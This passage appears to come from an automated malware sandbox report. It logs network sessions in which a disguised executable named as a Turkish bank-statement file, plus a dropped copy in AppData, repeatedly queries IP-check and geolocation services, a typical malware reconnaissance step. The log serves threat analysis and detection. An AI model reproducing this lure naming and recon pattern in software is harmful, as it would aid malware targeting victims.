Dec 10, 2024 14:07:45.549906015 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 192f98a3edc9ddbb1e3c4f0efe18b566 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49736	132.226.247.73	80	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:44.695183039 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:46.023703098 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 68070805198e9490085e7930f7700e11 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49740	132.226.247.73	80	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:47.352802038 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:48.657181978 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6f63bb520ecae6448892cc4a23c9ed37 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49741	132.226.247.73	80	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:47.810920954 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:49.114424944 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6fa365dacb3fac1381cd75da4b48a827 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49746	132.226.247.73	80	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:50.443588972 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:51.751549006 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 842bc5f5091af9edf0418020a59f7e87 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49747	132.226.247.73	80	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:50.907795906 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:52.212213993 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1f26405c65096289d835642693d627e7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49751	132.226.247.73	80	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:53.537935972 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:54.889584064 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0aef513fda1e2b4f1b782c2793669999 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49752	132.226.247.73	80	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:54.000767946 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:55.304212093 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 352dbc47bede0b131e4a0bf7cd973188 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49755	132.226.247.73	80	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:56.684415102 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:57.988333941 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1ab03bd4b0e26931e049e0bf932dfc7f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49756	132.226.247.73	80	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:07:57.134562969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:07:58.437798977 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3a9fedbc2da3eabb64a0c97137020f89 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49760	132.226.247.73	80	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 14:08:00.239660978 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 10, 2024 14:08:01.546425104 CET	321	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:08:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 459a9976db6d4243561365a97eea6172 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49718	172.67.177.134	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:35 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:35 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15378 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PH5%2F0bzz2wc7OYjy%2FiNSPrvJfWiAEtIGVXOjzuws0LSkpgG8ObziDXW4cx3rU3iJ5K6x2ujDh5oKMm8XMIbgzSDltjHPGHu1a1cJo7SMLeauh%2BSZgqslEgWb0IHcqoK2y2rFFS64"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75727c948c0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2008&min_rtt=1993&rtt_var=778&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1380614&cwnd=206&unsent_bytes=0&cid=f3bb9cbc50dcd7e9&ts=490&x=0"
2024-12-10 13:07:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49721	172.67.177.134	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:37 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:37 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15380 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DVsQEKL1SZu1tpF4EY2c6WYJMtNthZDdEwqYyENWzupQ1lcjjr8q3mFhts5lsbOCbnsWZUUYyyDBs%2F6cBl75VeOgMFZydAjfXHJwUL%2FM7s4jYz1vUacGoR3FSC8uQH68oTZJ8e%2BA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd757ffa5e43df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1772&rtt_var=702&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1647855&cwnd=243&unsent_bytes=0&cid=85c0f255f6963305&ts=452&x=0"
2024-12-10 13:07:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49723	172.67.177.134	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:38 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:39 UTC	873	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15382 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0doZY2vSdN0jJlrvTNCQkDFhXVkvq%2BHYEdYGQfrmhe1bkIYBU0TwpiWdgaAmMC%2By5bMR888tYzo6kEaqAwt974fKEtumal5nWm7l97IVUOQJxd1l6Rj0ANn5K11VWENYRX9H7u4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd7589bb82423e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1708&rtt_var=656&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1647855&cwnd=191&unsent_bytes=0&cid=7c6c89546fa0f9f8&ts=502&x=0"
2024-12-10 13:07:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49725	172.67.177.134	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:40 UTC	85	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-10 13:07:40 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15383 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dyKhLjK4fDOaoH12F6G8GvrKgSZbF8dARfiEVAZN7TqZU0BfM9qCDN8ct%2FseEeLEbXy6tZJ8hW5cGEKoQE7%2BNHDUCPf9p%2FaysiAPPYstjczDMV4eQL28njpGE9qyq3gysCCV3iNK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd7593db3918cc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1649&rtt_var=640&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1681059&cwnd=252&unsent_bytes=0&cid=98414a0113968a1f&ts=453&x=0"
2024-12-10 13:07:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49726	172.67.177.134	443	760	C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 13:07:41 UTC	61	OUT	GET /xml/8.46.123.175 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-10 13:07:41 UTC	875	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 13:07:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 15384 Last-Modified: Tue, 10 Dec 2024 08:51:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWhdbz89EJq3h1FvpvCUJRjSnwVBp7iCJL2dCEkSn8FveFokExZnYeGEjxpYNL3u9ucUUQ2uRES1SQOcWDTL7U1Mg%2FnbwjjvPGk2vjfOZ6v1XT0w1RXxx6CP3lpqe%2Ft%2FCq6QsyTe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8efd75971c984265-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1770&rtt_var=687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1649717&cwnd=195&unsent_bytes=0&cid=d35beda1fa5c437b&ts=453&x=0"
2024-12-10 13:07:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.175</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49732	172.67.177.134	443	6256	C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Timestamp	Bytes transferred	Direction	Data
